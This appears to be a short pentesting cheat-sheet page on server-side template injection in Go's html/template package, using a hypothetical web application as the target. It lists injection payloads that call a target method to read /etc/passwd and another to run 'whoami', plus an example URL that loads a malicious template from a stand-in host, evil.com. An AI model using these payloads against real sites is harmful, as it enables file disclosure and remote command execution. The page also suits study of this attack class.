Last modified: 2023-10-14


Golang html template is vulnerable to SSTI (Server Side Template Injection).


import "html/template"


template.New("foo").Parse("{{ . }}")

If a website uses a web framework written in Golang and uses html/template module for parsing a template file or strings, we may inject this template with our custom template file/string.


Assume a web application defines User struct, GetFile method, and ExecuteCmd method.

// `main.go` of target website

type User struct {
	Id string
	Name string

// Read contents of the file and output it.
func GetFile(filepath string) {

// Execute system command.
func ExecuteCmd(cmd string) {


{{ . }}

# Get the `User` struct values.
{{ .User }}

# Call the `GetFile` method to LFI.
{{ .GetFile "/etc/passwd" }}

# Call the `ExecuteCmd` method to RCE.
{{ .ExecuteCmd "whoami" }}

Also, if the website parses arbitrary template file, which concludes malicious payload like above, in some way e.g. SSRF(https://example.com/?file=http://evil.com/template.txt)

This file will be parsed by the website and lead SSTI.